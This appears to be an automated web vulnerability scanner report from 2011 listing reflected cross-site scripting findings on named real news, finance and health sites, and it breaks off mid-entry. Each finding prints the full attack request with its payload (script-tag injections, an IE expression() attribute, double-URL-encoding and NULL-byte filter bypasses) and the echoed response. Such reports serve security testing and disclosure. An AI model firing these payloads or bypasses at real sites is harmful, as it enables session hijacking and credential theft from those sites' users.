Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.10.10.1304575105; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 01:30:40 GMT
Connection: close
Content-Length: 6018

       <div id="857597" class="grid third flush_top threeup_entries">
           <div id="entry_857597" class="entry no_border">
               <div class="image_wrapper"><a href="http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html?ir=World" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');">            <img src="http://i.huffpost.com/gen/273847/thumbs/r-BIN-LADEN-medium260.jpg" border="0" width="260" height="75" alt="" />        </a></div>
               <h5><a href="http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html?ir=World" class="threeup_titles block margin_0_20" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');">CNN Poll Finds That Most People Think Bin Laden Is In Hell</a></h5>
           </div>
       </div>        <div id="entry_threeup_central" class="grid third flush_top threeup_entries">
           <div id="entry_threeup_central_inner" class="entry no_border world">
               <div class="image_wrapper">                    <a href="/world/" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');"><img src="http://i.huffpost.com/gen/273918/thumbs/s-LIBYA-INTERNATIONAL-AID-97x75.jpg" border=0 width=97 height=75 style="display:inline" /></a>                    <a href="/world/" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');"><img src="http://i.huffpost.com/gen/273951/thumbs/s-OSAMA-BIN-LADEN-PHOTOS-97x75.jpg" border=0 width=97 height=75 style="display:inline" /></a>                    <a href="/world/" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');"><img src="http://i.huffpost.com/gen/273798/thumbs/s-AFGHANISTAN-PAKISTAN-BIN-LADEN-97x75.jpg" border=0 width=97 height=75 style="display:inline" /></a>                </div>
               <h5><a href="/world/" target="_top">More In World:</a> <a href="/world/" target="_top" class="threeup_titles" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');">                    Libya Targets Aid Arrival...                    Bin Laden Raid Photos...                    Pakistan Had To Know?...                    </a>
               </h5>
           </div>
       </div>        <div id="857624" clas
...[SNIP]...

2. Cross-site scripting (reflected)
There are 55 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://www.aolnews.com/category/goodnews/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.aolnews.com
Path:   /category/goodnews/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c033e"%3bf7c25182fc9 was submitted in the REST URL parameter 2. This input was echoed as c033e";f7c25182fc9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /category/goodnewsc033e"%3bf7c25182fc9/ HTTP/1.1
Host: www.aolnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:20 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 11:56:20 GMT; path=/
Keep-Alive: timeout=5, max=999999
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 86979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
channel="us.news";
s_265.pageType="";
s_265.linkInternalFilters="javascript:,aolnews.com";
s_265.mmxgo = true;
s_265.prop1="";
s_265.prop2="main";
s_265.prop12="http://www.aolnews.com/category/goodnewsc033e";f7c25182fc9/";
s_265.prop18="goodnewsc033e\";f7c25182fc9";
s_265.prop19="";
s_265.prop20="";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.2. http://www.bankrate.com/funnel/mortgages/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankrate.com
Path:   /funnel/mortgages/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7abf6"style%3d"x%3aexpression(alert(1))"ef43b8923ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7abf6"style="x:expression(alert(1))"ef43b8923ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /funnel/mortgages/?7abf6"style%3d"x%3aexpression(alert(1))"ef43b8923ec=1 HTTP/1.1
Host: www.bankrate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Servername: a-brmweb03
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 1.7.0
Content-Type: text/html; charset=utf-8
Expires: Thu, 05 May 2011 10:56:22 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 10:56:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 46805


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link type="text/css"
...[SNIP]...
<link rel="canonical" href="http://www.bankrate.com/funnel/mortgages/?7abf6"style="x:expression(alert(1))"ef43b8923ec=1" />
...[SNIP]...

2.3. http://www.citysbest.com/ [icid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /

Issue detail

The value of the icid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89199"><script>alert(1)</script>cd5f8e88860 was submitted in the icid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?icid=navbar_citysbest_main589199"><script>alert(1)</script>cd5f8e88860 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:46 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 01:58:46 GMT; path=/
Content-Type: text/html
Content-Length: 15674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<meta property="og:url" content="http://www.citysbest.com/?icid=navbar_citysbest_main589199"><script>alert(1)</script>cd5f8e88860"/>
...[SNIP]...

2.4. http://www.citysbest.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f2e5"><script>alert(1)</script>6009f09c189 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?icid=navbar_citysbest_main5&9f2e5"><script>alert(1)</script>6009f09c189=1 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:05 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 01:59:05 GMT; path=/
Content-Type: text/html
Content-Length: 15691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<meta property="og:url" content="http://www.citysbest.com/?icid=navbar_citysbest_main5&9f2e5"><script>alert(1)</script>6009f09c189=1"/>
...[SNIP]...

2.5. http://www.citysbest.com/traffic/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /traffic/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3384%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0ccc1ec0bf6 was submitted in the REST URL parameter 1. This input was echoed as f3384</script><script>alert(1)</script>0ccc1ec0bf6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /trafficf3384%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0ccc1ec0bf6/?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2F%3Ficid%3Dnavbar_citysbest_main5%2F&cb=76544643 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575100835-New%7C1367647100835%3B%20s_nrgvo%3DNew%7C1367647100836%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:57 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 01:59:57 GMT; path=/
Content-Type: text/html
Content-Length: 17861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
5.pfxID="acg";
s_265.pageName=s_265.pfxID+" : "+pageName;
s_265.channel="us.citybest";
s_265.linkInternalFilters="javascript:,citysbest.com";

var isCity = "";
s_265.prop1= isCity !='' ? "trafficf3384</script><script>alert(1)</script>0ccc1ec0bf6" : "national";

var isUrl2 = "";
s_265.prop2= isUrl2 != ''? "" :"main";

s_265.prop12=document.URL.split('?')[0];
s_265.events="";
s_265.products="";
//s_265.purchaseID=Math.ceil(Math.random()
...[SNIP]...

2.6. http://www.citysbest.com/traffic/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /traffic/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0958"><script>alert(1)</script>e2e8451909c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trafficd0958"><script>alert(1)</script>e2e8451909c/?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2F%3Ficid%3Dnavbar_citysbest_main5%2F&cb=76544643 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575100835-New%7C1367647100835%3B%20s_nrgvo%3DNew%7C1367647100836%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:35 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 01:59:36 GMT; path=/
Content-Type: text/html
Content-Length: 17532

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<meta property="og:url" content="http://www.citysbest.com/trafficd0958"><script>alert(1)</script>e2e8451909c/?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2F%3Ficid%3Dnavbar_citysbest_main5%2F&cb=76544643"/>
...[SNIP]...

2.7. http://www.dailyfinance.com/markets/mostactives [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.dailyfinance.com
Path:   /markets/mostactives

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7010'%3b71e04f33930 was submitted in the REST URL parameter 2. This input was echoed as b7010';71e04f33930 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/mostactivesb7010'%3b71e04f33930 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243_64_12_173_49=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; AOL_StockQuotesLiveUpdate=1; s_pers=%20s_getnr%3D1304575093082-New%7C1367647093082%3B%20s_nrgvo%3DNew%7C1367647093084%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.95b2; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.95b2;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:34 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: IPHONE_MESSAGE=2; Expires=Wed, 03-Aug-2011 10:56:34 GMT; Path=/
Set-Cookie: IPHONE_MESSAGE=2; Expires=Wed, 03-Aug-2011 10:56:34 GMT; Path=/
Content-Language: en
Content-Length: 68717
Keep-Alive: timeout=5, max=999
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Market Movers:</titl
...[SNIP]...
<!--
var relegenceTopics='MOSTACTIVESB7010';71E04F33930';
var RTN_SNIPPET_SIZE = '300';
var RTN_HOVER_TIMEOUT = '16000';
// -->
...[SNIP]...

2.8. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.everydayhealth.com
Path:   /allergy/climate-change-and-allergies.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc36d'%3bf5e1aa920da was submitted in the REST URL parameter 2. This input was echoed as fc36d';f5e1aa920da in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /allergy/climate-change-and-allergies.aspxfc36d'%3bf5e1aa920da HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Connection: close
Date: Thu, 05 May 2011 10:56:35 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpPBurMtkMjIxMTI2NS01ODVmLTQwMjYtOTNhZi1lZDQyOGE5ZWU2Y2E1; expires=Wed, 13-Jul-2011 21:36:35 GMT; path=/
Set-Cookie: ASP.NET_SessionId=dbvjd455jngipsngirkccraw; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16443


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<script> COMSCORE.beacon({ c1: 2, c2: '6035818', c3: '', c4: 'www.everydayhealth.com/allergy/climate-change-and-allergies.aspxfc36d';f5e1aa920da', c5: '', c6: '', c15: ''});</script>
...[SNIP]...

2.9. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /allergy/climate-change-and-allergies.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c6e76"><script>alert(1)</script>76c82397b8f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c6e76"><script>alert(1)</script>76c82397b8f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /allergy/climate-change-and-allergies.aspx?%00c6e76"><script>alert(1)</script>76c82397b8f=1 HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:34 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpO*ri-NiNTMxMWZkZS04NTY4LTRiYjEtODAwOC0xN2Q0NzQ1YTM0NGQ1; expires=Wed, 13-Jul-2011 21:36:34 GMT; path=/
Set-Cookie: ASP.NET_SessionId=c5cfbq55mbxvfz55feiauhef; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49343


<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
   Can Climate Change Cause Allergy? - Allergy Center - Every
...[SNIP]...
<meta property="og:url" runat="server" id="fburl" content="http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx?%00c6e76"><script>alert(1)</script>76c82397b8f=1" />
...[SNIP]...

2.10. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.everydayhealth.com
Path:   /heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ac7e'%3b98481e38035 was submitted in the REST URL parameter 3. This input was echoed as 8ac7e';98481e38035 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx8ac7e'%3b98481e38035 HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Connection: close
Date: Thu, 05 May 2011 10:56:36 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpPFHohNiNzhlZWI5Mi02YzQyLTQyMWMtOWExZS1iZWJlZjRmYjg5ZTU1; expires=Wed, 13-Jul-2011 21:36:36 GMT; path=/
Set-Cookie: ASP.NET_SessionId=hxo2de55iuwcrdvelxqosn55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16547


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<script> COMSCORE.beacon({ c1: 2, c2: '6035818', c3: '', c4: 'www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx8ac7e';98481e38035', c5: '', c6: '', c15: ''});</script>
...[SNIP]...

2.11. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %004b806"><script>alert(1)</script>8759e8fbd80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4b806"><script>alert(1)</script>8759e8fbd80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx?%004b806"><script>alert(1)</script>8759e8fbd80=1 HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:35 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpPB*XTNmOWRkZmU1ZS0xODQ2LTQ1ZTAtYWNlYS0xY2FjNmI1YzNlZDI1; expires=Wed, 13-Jul-2011 21:36:35 GMT; path=/
Set-Cookie: ASP.NET_SessionId=k0j5vvz5mxglzzntqc5yh03h; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49861


<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
   Is Cholesterol Treatment Worth It? - EverydayHealth.com
<
...[SNIP]...
<meta property="og:url" runat="server" id="fburl" content="http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx?%004b806"><script>alert(1)</script>8759e8fbd80=1" />
...[SNIP]...

2.12. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.everydayhealth.com
